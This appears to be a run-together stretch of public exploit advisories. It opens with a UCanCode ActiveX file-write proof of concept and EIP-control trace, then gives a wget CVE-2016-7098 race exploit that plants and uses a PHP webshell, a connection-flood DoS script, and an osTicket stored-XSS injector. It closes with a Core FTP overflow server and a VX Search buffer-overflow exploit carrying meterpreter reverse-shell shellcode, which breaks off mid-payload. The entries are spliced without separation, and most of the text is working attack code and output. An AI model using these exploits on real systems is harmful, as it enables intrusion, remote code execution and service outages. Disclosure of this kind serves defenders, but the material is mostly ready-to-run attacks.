Class: UCCPrint {A4FCBD44-6BF5-405C-9598-C8E8ADCE4488}
Sub ExportAsBitmapFile (ByVal strFile As String)
----------------------------------------
Library: UCCPRINTLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCPrint.ocx
Class: UCCPrint {A4FCBD44-6BF5-405C-9598-C8E8ADCE4488}
Sub ExportAsEMFFile (ByVal strFile As String)
----------------------------------------
Library: TKDRAWCADLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\TKDRAW~1.OCX
Class: TKDrawCAD {9022B790-B810-45B4-80BC-2D94EEC5343C}
Sub ExportAsBitmapFile (ByVal strFile As String)
----------------------------------------
Library: TKDRAWCADLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\TKDRAW~1.OCX
Class: TKDrawCAD {9022B790-B810-45B4-80BC-2D94EEC5343C}
Sub ExportAsEMFFile (ByVal strFile As String)
----------------------------------------
Library: UCCDRAWLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDraw.ocx
Class: UCCDraw {4B5BEE59-EDD2-4082-A9F7-D65E1CA20FA7}
Sub ExportAsBitmapFile (ByVal strFile As String)
----------------------------------------
Library: UCCDRAWLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDraw.ocx
Class: UCCDraw {4B5BEE59-EDD2-4082-A9F7-D65E1CA20FA7}
Sub ExportAsEMFFile (ByVal strFile As String)
----------------------------------------
Library: UCCDRAWLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDraw.ocx
Class: UCCDraw {4B5BEE59-EDD2-4082-A9F7-D65E1CA20FA7}
Function ExportToBitmapFile (ByVal lpszFile As String) As Boolean
----------------------------------------
Library: UCCVIEWERLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCVIE~1.OCX
Class: UCCViewer {3B7B3C36-8515-4E15-BC46-D1BEBA2F360C}
Sub ExportAsBitmapFile (ByVal strFile As String)
----------------------------------------
Library: UCCVIEWERLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCVIE~1.OCX
Class: UCCViewer {3B7B3C36-8515-4E15-BC46-D1BEBA2F360C}
Sub ExportAsEMFFile (ByVal strFile As String)
----------------------------------------
2) various Save* methods:
----------------------------------------
Library: UCCSIMPLELib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCSIM~1.OCX
Class: UCCSIMPLE {EF3AAE34-E60A-11E1-9656-00FF8A2F9C5B}
Function SaveMemory2 (ByVal filename As String, ByVal pData As Long, ByVal nSize As Long) As Boolean
----------------------------------------
Library: UCCHMILib - C:\PROGRA~1\UCANCO~1\UCANCO~1\HMI_OCX\UCCHMI.ocx
Class: UCCHMI {EDBBC1DC-58B2-4404-85FD-F9B1C05D96EF}
Function SaveMemory2 (ByVal filename As String, ByVal pData As Long, ByVal nSize As Long) As Boolean
----------------------------------------
Library: UCCUMLLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCUML.ocx
Class: UCCUML {C1F0EE85-363F-483D-97D0-87E2A537BFBA}
Function SaveMemory2 (ByVal filename As String, ByVal pData As Long, ByVal nSize As Long) As Boolean
----------------------------------------
Library: UCCDIAGRAMLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDIA~1.OCX
Class: UCCDiagram {B6A3BF2C-F770-4182-BE7F-103BF2C76826}
Function SaveMemory2 (ByVal filename As String , ByVal pData As Long , ByVal nSize As Long) As Boolean
----------------------------------------
Library: UCCDIAGRAMLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDIA~1.OCX
Class: UCCDiagram {B6A3BF2C-F770-4182-BE7F-103BF2C76826}
Sub SaveToXdgFile (ByVal lpszFileName As String)
----------------------------------------
Library: UCCDIAGRAMLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDIA~1.OCX
Class: UCCDiagram {B6A3BF2C-F770-4182-BE7F-103BF2C76826}
Function SaveTemplateToFile (ByVal strFile As String) As Boolean
----------------------------------------
Library: UCCPRINTLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCPrint.ocx
Class: UCCPrint {A4FCBD44-6BF5-405C-9598-C8E8ADCE4488}
Function SaveMemory2 (ByVal filename As String , ByVal pData As Long , ByVal nSize As Long) As Boolean
----------------------------------------
Library: UCCPRINTLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCPrint.ocx
Class: UCCPrint {A4FCBD44-6BF5-405C-9598-C8E8ADCE4488}
Sub SaveToXdgFile (ByVal lpszFileName As String)
----------------------------------------
Library: UCCPRINTLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCPrint.ocx
Class: UCCPrint {A4FCBD44-6BF5-405C-9598-C8E8ADCE4488}
Function SaveTemplateToFile (ByVal strFile As String) As Boolean
----------------------------------------
Library: TKDRAWCADLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\TKDRAW~1.OCX
Class: TKDrawCAD {9022B790-B810-45B4-80BC-2D94EEC5343C}
Function SaveMemory2 (ByVal filename As String , ByVal pData As Long , ByVal nSize As Long) As Boolean
----------------------------------------
Library: TKDRAWCADLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\TKDRAW~1.OCX
Class: TKDrawCAD {9022B790-B810-45B4-80BC-2D94EEC5343C}
Sub SaveToXdgFile (ByVal lpszFileName As String)
----------------------------------------
Library: TKDRAWCADLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\TKDRAW~1.OCX
Class: TKDrawCAD {9022B790-B810-45B4-80BC-2D94EEC5343C}
Function SaveTemplateToFile (ByVal strFile As String) As Boolean
----------------------------------------
Library: UCCDRAWLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDraw.ocx
Class: UCCDraw {4B5BEE59-EDD2-4082-A9F7-D65E1CA20FA7}
Function SaveMemory2 (ByVal filename As String, ByVal pData As Long, ByVal nSize As Long) As Boolean
----------------------------------------
Library: UCCDRAWLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDraw.ocx
Class: UCCDraw {4B5BEE59-EDD2-4082-A9F7-D65E1CA20FA7}
Function SaveDocument (ByVal lpszFileName As String) As Boolean
----------------------------------------
Library: UCCDRAWLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDraw.ocx
Class: UCCDraw {4B5BEE59-EDD2-4082-A9F7-D65E1CA20FA7}
Sub SaveToXdgFile (ByVal lpszFileName As String)
----------------------------------------
Library: UCCVIEWERLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCVIE~1.OCX
Class: UCCViewer {3B7B3C36-8515-4E15-BC46-D1BEBA2F360C}
Function SaveMemory2 (ByVal filename As String, ByVal pData As Long, ByVal nSize As Long) As Boolean
----------------------------------------
Library: UCCVIEWERLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCVIE~1.OCX
Class: UCCViewer {3B7B3C36-8515-4E15-BC46-D1BEBA2F360C}
Sub SaveToXdgFile (ByVal lpszFileName As String)
----------------------------------------
Library: UCCVIEWERLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCVIE~1.OCX
Class: UCCViewer {3B7B3C36-8515-4E15-BC46-D1BEBA2F360C}
Function SaveTemplateToFile (ByVal strFile As String) As Boolean
----------------------------------------
3) various Write methods:
----------------------------------------
Library: UCCSIMPLELib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCSIM~1.OCX
Class: UCCSIMPLE {EF3AAE34-E60A-11E1-9656-00FF8A2F9C5B}
Function Write (ByVal lpszFileName As String) As Boolean
----------------------------------------
Library: UCCHMILib - C:\PROGRA~1\UCANCO~1\UCANCO~1\HMI_OCX\UCCHMI.ocx
Class: UCCHMI {EDBBC1DC-58B2-4404-85FD-F9B1C05D96EF}
Function Write (ByVal lpszFileName As String) As Boolean
----------------------------------------
Library: UCCUMLLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCUML.ocx
Class: UCCUML {C1F0EE85-363F-483D-97D0-87E2A537BFBA}
Function Write (ByVal lpszFileName As String) As Boolean
----------------------------------------
Library: UCCDIAGRAMLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDIA~1.OCX
Class: UCCDiagram {B6A3BF2C-F770-4182-BE7F-103BF2C76826}
Function Write (ByVal lpszFileName As String) As Boolean
----------------------------------------
Library: UCCPRINTLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCPrint.ocx
Class: UCCPrint {A4FCBD44-6BF5-405C-9598-C8E8ADCE4488}
Function Write (ByVal lpszFileName As String) As Boolean
----------------------------------------
Library: TKDRAWCADLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\TKDRAW~1.OCX
Class: TKDrawCAD {9022B790-B810-45B4-80BC-2D94EEC5343C}
Function Write (ByVal lpszFileName As String) As Boolean
----------------------------------------
Library: UCCDRAWLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDraw.ocx
Class: UCCDraw {4B5BEE59-EDD2-4082-A9F7-D65E1CA20FA7}
Function Write (ByVal lpszFileName As String) As Boolean
----------------------------------------
Library: UCCVIEWERLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCVIE~1.OCX
Class: UCCViewer {3B7B3C36-8515-4E15-BC46-D1BEBA2F360C}
Function Write (ByVal lpszFileName As String) As Boolean
----------------------------------------
PROOF OF CONCEPT:
<html>
<object classid="clsid:B6A3BF2C-F770-4182-BE7F-103BF2C76826" id="test"></object>
<script language = "vbscript">
test.SaveTemplateToFile buff,C:\Windows\_system.ini
</script>
</html>
----------------------------------------
----------------------------------------
REMOTE CODE EXECUTION
This product is so poor coded that remote code execution is possible using a lot of functions (and I'm lazy),
so here it is the description of just one of it, "AddDWordUserProperty":
CPU Disasm
Address Hex dump Command Comments
...
...
1007FEB5 |. 8D5424 44 LEA EDX,[LOCAL.36]
1007FEB9 |. 51 PUSH ECX
1007FEBA |. 8B06 MOV EAX,DWORD PTR DS:[ESI] <- WE CAN CONTROL ESI
1007FEBC |. 52 PUSH EDX
1007FEBD |. 8BCE MOV ECX,ESI
1007FEBF |. C78424 DC0000 MOV DWORD PTR SS:[LOCAL.0],0
1007FECA |. 897C24 10 MOV DWORD PTR SS:[LOCAL.51],EDI
1007FECE |. FF90 04030000 CALL DWORD PTR DS:[EAX+304]
1007FED4 |. 85C0 TEST EAX,EAX
...
...
Registers:
CPU - thread 9. (00000B38), module UCCVIE~1_OCX
EAX 015DD1D0
ECX 015DD194
EDX 015DD1D0
EBX 00000000
ESP 015DD188
EBP 015DD300
ESI 41414141 <- FIRST ARGUMENT PASSED TO AddDWordUserProperty METHOD
EDI 42424242 <- SECOND ARGUMENT PASSED TO AddDWordUserProperty METHOD
EIP 1007FEBA UCCVIE~1_OCX.1007FEBA
----------------------------------------------------------------------
We can use it to pass a valid memory address so that we can find a more comfortable situation :)
CPU Disasm
Address Hex dump Command Comments
...
...
1007FEB5 |. 8D5424 44 LEA EDX,[LOCAL.36]
1007FEB9 |. 51 PUSH ECX
1007FEBA |. 8B06 MOV EAX,DWORD PTR DS:[ESI]
1007FEBC |. 52 PUSH EDX
1007FEBD |. 8BCE MOV ECX,ESI
1007FEBF |. C78424 DC0000 MOV DWORD PTR SS:[LOCAL.0],0
1007FECA |. 897C24 10 MOV DWORD PTR SS:[LOCAL.51],EDI
1007FECE |. FF90 04030000 CALL DWORD PTR DS:[EAX+304] <- WE NOW ARE IN CONTROL OF EAX
1007FED4 |. 85C0 TEST EAX,EAX
...
...
Registers
CPU - thread 9. (00000B38), module UCCVIE~1_OCX
EAX 45454545 <- THIS VALUE THAT WAS PREVIOUSLY STORED IN MEMORY, IF WE CHANGE IT IN ANOTHER VALID ADDRESS...
ECX 00030040 ASCII "EEEE"
EDX 015DD1D0
EBX 00000000
ESP 015DD184
EBP 015DD300
ESI 00030040 ASCII "EEEE"
EDI 42424242
EIP 1007FECE UCCVIE~1_OCX.1007FECE
And...
CPU - thread 9. (00000B38)
EAX 0002FDBC
ECX 00030040 ASCII "EEEE"
EDX 015DD1D0
EBX 00000000
ESP 015DD180
EBP 015DD300
ESI 00030040 ASCII "EEEE"
EDI 42424242
EIP 46464646 <- BINGO :)
----------------------------------------
----------------------------------------
BONUS STAGE:
There are a huge number of DoS... happy hunting :)
Peace, your friendly neighborhood shinnai.
---------------------------------------------------------------------
'''
=============================================
- Discovered by: Dawid Golunski
- dawid[at]legalhackers.com
- https://legalhackers.com
- https://legalhackers.com/advisories/Wget-Exploit-ACL-bypass-RaceCond-CVE-2016-7098.html
- CVE-2016-7098
- Release date: 24.11.2016
- Revision 1.0
- Severity: Medium
=============================================
I. VULNERABILITY
-------------------------
GNU Wget < 1.18 Access List Bypass / Race Condition
II. BACKGROUND
-------------------------
"GNU Wget is a free software package for retrieving files using HTTP, HTTPS and
FTP, the most widely-used Internet protocols.
It is a non-interactive commandline tool, so it may easily be called from
scripts, cron jobs, terminals without X-Windows support, etc.
GNU Wget has many features to make retrieving large files or mirroring entire
web or FTP sites easy
"
https://www.gnu.org/software/wget/
III. INTRODUCTION
-------------------------
GNU wget in version 1.17 and earlier, when used in mirroring/recursive mode,
is affected by a Race Condition vulnerability that might allow remote attackers
to bypass intended wget access list restrictions specified with -A parameter.
This might allow attackers to place malicious/restricted files onto the system.
Depending on the application / download directory, this could potentially lead
to other vulnerabilities such as code execution etc.
IV. DESCRIPTION
-------------------------
When wget is used in recursive/mirroring mode, according to the manual it can
take the following access list options:
"Recursive Accept/Reject Options:
-A acclist --accept acclist
-R rejlist --reject rejlist
Specify comma-separated lists of file name suffixes or patterns to accept or
reject. Note that if any of the wildcard characters, *, ?, [ or ], appear in
an element of acclist or rejlist, it will be treated as a pattern, rather
than a suffix."
These can for example be used to only download JPG images.
It was however discovered that when a single file is requested with recursive
option (-r / -m) and an access list ( -A ), wget only applies the checks at the
end of the download process.
This can be observed in the output below:
# wget -r -nH -A '*.jpg' http://attackersvr/test.php
Resolving attackersvr... 192.168.57.1
Connecting to attackersvr|192.168.57.1|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/plain]
Saving to: ‘test.php’
15:05:46 (27.3 B/s) - ‘test.php’ saved [52]
Removing test.php since it should be rejected.
FINISHED
Although wget deletes the file at the end of the download process, this creates
a race condition as an attacker with control over the URL/remote server could
intentionally slow down the download process so that they had a chance to make
use of the malicious file before it gets deleted.
It is very easy to win the race as the file only gets deleted after the HTTP
connection is terminated. The attacker could therefore keep the connection open
as long as it was necessary to make use of the uploaded file as demonstrated
in the proof of concept below.
V. PROOF OF CONCEPT EXPLOIT
------------------------------
Here is a simple vulnerable PHP web application that uses wget to download
images from a user-provided server/URL:
---[ image_importer.php ]---
<?php
// Vulnerable webapp [image_importer.php]
// Uses wget to import user images from provided site URL
// It only accepts JPG files (-A wget option).
if ( isset($_GET['imgurl']) ) {
$URL = escapeshellarg($_GET['imgurl']);
} else {
die("imgurl parameter missing");
}
if ( !file_exists("image_uploads") ) {
mkdir("image_uploads");
}
// Download user JPG images into /image_uploads directory
system("wget -r -nH -P image_uploads -A '*.jpg' $URL 2>&1");
?>
----------------------------
For example:
https://victimsvr/image_importer.php?imgurl= href="http://images/logo.jpg">http://images/logo.jpg
will cause wget to upload logo.jpg file into:
https://victimsvr/images_uploads/logo.jpg
The wget access list (-A) is to ensure that only .jpg files get uploaded.
However due to the wget race condition vulnerability an attacker could use
the exploit below to upload an arbitrary PHP script to /image_uploads directory
and achieve code execution.
---[ wget-race-exploit.py ]---
'''
#!/usr/bin/env python
#
# Wget < 1.18 Access List Bypass / Race Condition PoC Exploit
# CVE-2016-7098
#
# Dawid Golunski
# https://legalhackers.com
#
#
# This PoC wget exploit can be used to bypass wget -A access list and upload a malicious
# file for long enough to take advantage of it.
# The exploit sets up a web server on port 80 and waits for a download request from wget.
# It then supplies a PHP webshell payload and requests the uploaded file before it gets
# removed by wget.
#
# Adjust target URL (WEBSHELL_URL) before executing.
#
# Full advisory at:
#
# https://legalhackers.com/advisories/Wget-Exploit-ACL-bypass-RaceCond-CVE-2016-7098.html
#
# Disclaimer:
#
# For testing purposes only. Do no harm.
#
#
import SimpleHTTPServer
import time
import SocketServer
import urllib2
import sys
HTTP_LISTEN_IP = '0.0.0.0'
HTTP_LISTEN_PORT = 80
PAYLOAD='''
<?php
//our webshell
system($_GET["cmd"]);
system("touch /tmp/wgethack");
?>
'''
# Webshell URL to be requested before the connection is closed
# i.e before the uploaded "temporary" file gets removed.
WEBSHELL_URL="http://victimsvr/image_uploads/webshell.php"
# Command to be executed through 'cmd' GET paramter of the webshell
CMD="/usr/bin/id"
class wgetExploit(SimpleHTTPServer.SimpleHTTPRequestHandler):
def do_GET(self):
# Send the payload on GET request
print "[+] Got connection from wget requesting " + self.path + " via GET :)\n"
self.send_response(200)
self.send_header('Content-type', 'text/plain')
self.end_headers()
self.wfile.write(PAYLOAD)
print "\n[+] PHP webshell payload was sent.\n"
# Wait for the file to be flushed to disk on remote host etc.
print "[+} Sleep for 2s to make sure the file has been flushed to the disk on the target...\n"
time.sleep(2)
# Request uploaded webshell
print "[+} File '" + self.path + "' should be saved by now :)\n"
print "[+} Executing " + CMD + " via webshell URL: " + WEBSHELL_URL + "?cmd=" + CMD + "\n"
print "[+} Command result: "
print urllib2.urlopen(WEBSHELL_URL+"?cmd="+CMD).read()
print "[+} All done. Closing HTTP connection...\n"
# Connection will be closed on request handler return
return
handler = SocketServer.TCPServer((HTTP_LISTEN_IP, HTTP_LISTEN_PORT), wgetExploit)
print "\nWget < 1.18 Access List Bypass / Race Condition PoC Exploit \nCVE-2016-7098\n\nDawid Golunski \nhttps://legalhackers.com \n"
print "[+} Exploit Web server started on HTTP port %s. Waiting for wget to connect...\n" % HTTP_LISTEN_PORT
handler.serve_forever()
'''
------------------------------
If the attacker run this exploit on their server ('attackersver') and pointed
the vulnerable script image_importer.php at it via URL:
https://victimsvr/image_importer.php?imgurl= href="http://attackersvr/webshell.php">http://attackersvr/webshell.php
The attacker will see output similar to:
root@attackersvr:~# ./wget-race-exploit.py
Wget < 1.18 Access List Bypass / Race Condition PoC Exploit
CVE-2016-7098
Dawid Golunski
https://legalhackers.com
[+} Exploit Web server started on HTTP port 80. Waiting for wget to connect...
[+] Got connection from wget requesting /webshell.php via GET :)
victimsvr - - [24/Nov/2016 00:46:18] "GET /webshell.php HTTP/1.1" 200 -
[+] PHP webshell payload was sent.
[+} Sleep for 2s to make sure the file has been flushed to the disk on the target...
[+} File '/webshell.php' should be saved by now :)
[+} Executing /usr/bin/id via webshell URL: http://victimsvr/image_uploads/webshell.php?cmd=/usr/bin/id
[+} Command result:
uid=33(www-data) gid=33(www-data) groups=33(www-data),1002(nagcmd)
[+} All done. Closing HTTP connection...
VI. BUSINESS IMPACT
-------------------------
The vulnerability might allow remote servers to bypass intended wget access list
restrictions to temporarily store a malicious file on the server.
In certain cases, depending on the context wget command was used in and download
path, this issue could potentially lead to other vulnerabilities such as
script execution as shown in the PoC section.
VII. SYSTEMS AFFECTED
-------------------------
Wget < 1.18
VIII. SOLUTION
-------------------------
Update to latest version of wget 1.18 or apply patches provided by the vendor.
IX. REFERENCES
-------------------------
https://legalhackers.com
https://legalhackers.com/advisories/Wget-Exploit-ACL-bypass-RaceCond-CVE-2016-7098.html
https://legalhackers.com/exploits/CVE-2016-7098/wget-race-exploit.py
https://www.gnu.org/software/wget/
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7098
https://security-tracker.debian.org/tracker/CVE-2016-7098
http://lists.opensuse.org/opensuse-updates/2016-09/msg00044.html
http://lists.gnu.org/archive/html/bug-wget/2016-08/msg00124.html
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7098
X. CREDITS
-------------------------
The vulnerability has been discovered by Dawid Golunski
dawid (at) legalhackers (dot) com
https://legalhackers.com
XI. REVISION HISTORY
-------------------------
24.11.2016 - Advisory released
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.
'''
# Exploit Title: Remote Utilities - Host 6.3 - Denial of Service
# Date: 2016-11-25
# Exploit Author: Peter Baris
# Vendor Homepage: www.remoteutilities.com
# Software Link: http://saptech-erp.com.au/resources/executables/host6.3.zip
# Version: 6.3.0.6 - (other version are also affected below version 6.5 beta 3)
# Tested on: Windows 7 SP1 x64 and Windows Server 2008 R2
# After the notification, the company released a fix in version 6.5 beta 3
# On Windows 7 - the software refuses connections after execution.
# On Windows 2008 R2 it caused 100% CPU usage and occasional server crash when 1 core was assigned
#!/usr/bin/python
import socket
counter=0
while (counter <= 5000):
counter=counter+1
print(counter)
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(('<host address>',5650))
s.close()
# Exploit Title: Osticket 1.9.14 and below (X-Forwarded-For) Stored XSS.
# Date: 24-11-2016
# Exploit Author: Joaquin Ramirez Martinez [ i0-SEC ]
# Software Link: http://osticket.com/
# Vendor: Osticket
"""
==============
DESCRIPTION
==============
**osTicket** is a widely-used open source support ticket system. It seamlessly
integrates inquiries created via email, phone and web-based forms into a
simple easy-to-use multi-user web interface. Manage, organize and archive
all your support requests and responses in one place while providing your
customers with accountability and responsiveness they deserve.
(copy of Osticket - README.md)
=======================
VULNERABILITY DETAILS
=======================
file `osticket/upload/bootstrap.php` contains this
snippet of code (line 337-340):
...
if (isset($_SERVER['HTTP_X_FORWARDED_FOR']))
// Take the left-most item for X-Forwarded-For
$_SERVER['REMOTE_ADDR'] = trim(array_pop(
explode(',', $_SERVER['HTTP_X_FORWARDED_FOR'])));
....
The $_SERVER['REMOTE_ADDR'] value gets overrided with the `X-Forwarded-For` header value,
at this point, it is not a vulnerability but...
file `osticket/upload/include/class.osticket.php` line 309-315 :
...
//Save log based on system log level settings.
$sql='INSERT INTO '.SYSLOG_TABLE.' SET created=NOW(), updated=NOW() '
.',title='.db_input(Format::sanitize($title, true))
.',log_type='.db_input($loglevel[$level])
.',log='.db_input(Format::sanitize($message, false))
.',ip_address='.db_input($_SERVER['REMOTE_ADDR']);
db_query($sql, false);
....
Everytime when a csrf attack is dettected (checking `X_CSRFTOKEN` header or the post parameter `__CSRFToken__`),
Osticket saves into database the user controled value $_SERVER['REMOTE_ADDR'] even if it has an invalid format.
Finally the XSS is triggered when a user who can see the system logs like an administrator, visits
the /scp/logs.php URI. It happens because osticket does not encode the output of the data stored into the database.
The code responsible for lanching the XSS is located in `osticket/upload/include/staff/syslogs.inc-php`
line 142...
...
<td><?php echo $row['ip_address']; ?></td>
...
So...
An attacker can make an HTTP request with a header `X-Forwarded-For` containing the XSS payload
with an invalid CSRF token to the login interface waiting for an administrator to view the logs and trigger the XSS.
================
DEMONSTRATION
================
Demo video: https://www.youtube.com/watch?v=lx_WlL89F70
The demo also show a low severity XSS vulnerability in the helpdesk name/title of osticket.
================
REFERENCES
================
https://github.com/osTicket/osTicket/releases
https://github.com/osTicket/osTicket/releases/tag/v1.9.15
X-Forwarded-For XSS:
https://github.com/osTicket/osTicket/pull/3439
https://github.com/osTicket/osTicket/commit/4396f91cdc990b7da598a7562eb634b89314b631
heldeskt name/tile XSS:
https://github.com/osTicket/osTicket/pull/3439
https://github.com/osTicket/osTicket/commit/2fb47bd84d1905b49beab05fcf3f01b00a171c37
================
MITIGATIONS
================
update to version 1.9.15 or later
================
CREDITS
================
Vulnerability discovered by Joaquin Ramirez Martinez
https://www.youtube.com/channel/UCe1Ex2Y0wD71I_cet-Wsu7Q/videos
https://twitter.com/rammarj
================
TIMELINE
================
13-07-2016 - Vulnerability found
19-09-2016 - Osticket knew the flaws
01-11-2016 - Osticket patches vulnerabilities (v1.9.15 released)
24-11-2016 - Public disclosure.
"""
import urllib
import urllib2
from optparse import OptionParser
options = OptionParser(usage='python %prog [options]', description='Stored XSS')
options.add_option('-t', '--target', type='string', default='http://localhost', help='(required) example: http://localhost')
options.add_option('-p', '--path', type='string', default='/', help='osticket path. Default: /')
options.add_option('-x', '--payload', type='string', default='<svg/onload=alert(/Osticket_XSSed_by_i0-sec/)>'
, help='xss payload. Default: "<svg/onload=alert(/Osticket_XSSed_by_i0-sec/)>"')
banner = """
======================================================
OSTICKET
"The most popular ticketing system in the world"
Stored XSS
by i0-sec (Joaquin R. M.)
======================================================
"""
def main():
opts,args = options.parse_args()
print(banner)
server = opts.target
path = opts.path
body = urllib.urlencode({"__CSRFToken__":"invalid", "do":"scplogin", "userid":"invalid", "passwd":"invalid", "submit":""})
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36",
"Content-type": "application/x-www-form-urlencoded", "X-Forwarded-For": opts.payload}
url = server+path+"/scp/login.php" #default login interface URI for OSTICKET
print('[+] Connecting to '+server+path)
req = urllib2.Request(url, body, headers)
try:
print('[+] Sending payload... ')
response = urllib2.urlopen(req)
html = response.read()
except Exception, e:
pass
print '[+] Payload sent.'
print '[+] Completed.\n'
if __name__ == '__main__':
main()
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/CORE-FTP-REMOTE-SSH-SFTP-BUFFER-OVERFLOW.txt
[+] ISR: ApparitionSec
Vendor:
===============
www.coreftp.com
Product:
========================
Core FTP LE (client)
v2.2 build 1883
Core FTP LE - free Windows software that includes the client FTP features
you need. Features like SFTP (SSH), SSL, TLS, FTPS, IDN,
browser integration, site to site transfers, FTP transfer resume, drag and
drop support, file viewing & editing, firewall support,
custom commands, FTP URL parsing, command line transfers, filters, and
much, much more.
Vulnerability Type:
================================
Remote SSH/SFTP Buffer Overflow
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
Core FTP client is vulnerable to remote buffer overflow denial of service
when connecting to a malicious server using
SSH/SFTP protocol.
Upon receiving an overly long string of junk from the malicious FTP server
response, Core FTP crashes and the stack
is corrupted with several registers EBX, EDX, EDI being overwritten as can
be seen below.
WinDbg dump...
(d9c.16d8): Access violation - code c0000005 (first/second chance not
available)
eax=035b0000 ebx=00004141 ecx=03ac7e40 edx=41414141 esi=03ac7e38
edi=41414141
eip=77313ac3 esp=0439fa10 ebp=0439fae0 iopl=0 nv up ei pl nz ac pe
nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b
efl=00010216
ntdll!RtlImageNtHeader+0x92f:
77313ac3 8b12 mov edx,dword ptr [edx]
ds:002b:41414141=????????
Exploit code(s):
===============
import socket
print 'hyp3rlinx - Apparition Security'
print 'Core FTP SSH/SFTP Remote Buffer Overflow / DOS\r\n'
host='127.0.0.1'
port = 22
s = socket.socket()
payload="A"*77500
s.bind((host, port))
s.listen(5)
print 'Listening on port... %i' %port
print 'Connect to me!'
while True:
conn, addr = s.accept()
conn.send(payload+'\r\n')
conn.close()
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.
hyp3rlinx
#!/usr/bin/python
print "VX Search Enterprise 9.1.12 Login Buffer Overflow"
print "Author: Tulpa / tulpa[at]tulpa-security[dot]com"
#Author website: www.tulpa-security.com
#Author twitter: @tulpa_security
#Exploit will land you NT AUTHORITY\SYSTEM
#You do not need to be authenticated, password below is garbage
#Swop out IP, shellcode and remember to adjust '\x41' for bytes
#Tested on Windows 7 x86 Enterprise SP1
#Vendor has been notified on multiple occasions
#Exploit for version 9.0.26: www.exploit-db.com/exploits/40455/
#Shout-out to carbonated and ozzie_offsec
import socket
import sys
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.123.130',80))
#bad chars \x00\x0a\x0d\x26
#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.134 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest
#payload size 308
buf = ""
buf += "\xdb\xdc\xb8\x95\x49\x89\x1d\xd9\x74\x24\xf4\x5f\x33"
buf += "\xc9\xb1\x47\x31\x47\x18\x83\xc7\x04\x03\x47\x81\xab"
buf += "\x7c\xe1\x41\xa9\x7f\x1a\x91\xce\xf6\xff\xa0\xce\x6d"
buf += "\x8b\x92\xfe\xe6\xd9\x1e\x74\xaa\xc9\x95\xf8\x63\xfd"
buf += "\x1e\xb6\x55\x30\x9f\xeb\xa6\x53\x23\xf6\xfa\xb3\x1a"
buf += "\x39\x0f\xb5\x5b\x24\xe2\xe7\x34\x22\x51\x18\x31\x7e"
buf += "\x6a\x93\x09\x6e\xea\x40\xd9\x91\xdb\xd6\x52\xc8\xfb"
buf += "\xd9\xb7\x60\xb2\xc1\xd4\x4d\x0c\x79\x2e\x39\x8f\xab"
buf += "\x7f\xc2\x3c\x92\xb0\x31\x3c\xd2\x76\xaa\x4b\x2a\x85"
